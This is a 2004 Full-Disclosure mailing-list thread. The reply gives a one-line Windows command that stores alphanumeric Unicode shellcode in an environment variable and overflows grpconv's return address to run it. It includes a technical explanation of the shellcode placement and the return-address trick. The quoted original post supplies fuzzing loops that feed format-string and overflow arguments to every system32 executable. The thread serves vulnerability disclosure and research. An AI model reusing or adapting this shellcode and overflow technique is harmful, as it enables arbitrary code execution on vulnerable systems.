Re: Test your windows OS

["Berend-Jan Wever" <skylined () edup tudelft nl>]

Anybody wanna try if this shows a popup ? It's 1 line, if it wraps put it back together:
-------------------------------
set 
!!!!!!=YAIAIAIAIAIAIAIAIAIAIAIAIAIAIA44jXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBKLP1WPQT4K10P04KOPLLDKBPMLVMTKBHLH2HRLRLKPKPRH03P2NN1T2H3EBSQURRPT7K2QEWK8KN9X21KPKPKPSYZOTIWUNQYB0RK8MPKPKPM0Q1RLBLMPD9ROSE2RO0S2QQT3QUMP1QBRQUMPQR1U2L2O2NC7O0RTROMPBURSMQKPYXLTKPKPM0R3BKD90LS9RNQURDMPBP3G2N1UQTMPBY2OBUMQKPPR7KZBLLI9JZ9XKQKPKPM0HLQFPWTKQ5OLDKPTKUT8M1YZQB4K22MPKQIZNQI0NQ99OQDKP4DJM1JNP1KOWQ8OMCVLM1XGU5WPSEKFNY9ORUIZ1J4KQJNDKQJKS6TKLLPKDKPZMLKQJKDKKTTKKQYX1OQNKOYPA
 && %SystemRoot%\system32\grpconv 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA!
 
AAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ^N^A^N^A-------------------------------
Let me know if it works (off-list) and what system you're using. I developed it on win2ken sp4.
Tech stuff:
The string "^N^A^N^A" at the end should be typed "ctrl+N, ctrl+A, ctrl+N, ctrl+A". It works by installing a unicode 
shellcode in the environment string "!!!!!!" at 0x00010000. This should alphabetically be the first string so the 
shellcode should be at 0x0001000e. I overwrite a return address (^N^A=0x0001000e). The unicode shellcode needs to know 
it's own baseaddress, that's why there's "^N^A" twice: the first one is used to return, the second one is poped of by 
the shellcode to get the baseaddress.

Cheers,
SkyLined

----- Original Message ----- 
From: "Berend-Jan Wever" <skylined () edup tudelft nl>
To: <full-disclosure () lists netsys com>
Sent: Monday, October 04, 2004 17:39
Subject: [Full-disclosure] Test your windows OS


> Hi all,
>
> Wanna do a quick test to see if the programmers that wrote your windows operating system have any clue as to what 
> there doing ? Run these commands from cmd.exe in the system32 directory:
>
> for %i in (*.exe) do start %i %n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n
> for %i in (*.exe) do start %i AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.... (type as much "A"-s as cmd.exe allows on 
> one line.)
>
> Each command will execute every program in your system32 directory, most of them will either ignore the parameter or 
> report an error because the parameter doesn't make sence... But on my win2k system I found 6 programs vulnerable to 
> these very simple formatsting and BoF tests.... grpconv even gives EIP 0x00410041, can it be any easier?
>
> These are not vulnerabilities in itself: you cannot gain access or elevate priviledges but I just wanted to let you 
> know that these programmers did a sloppy job.
>
> Cheers,
> SkyLined
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html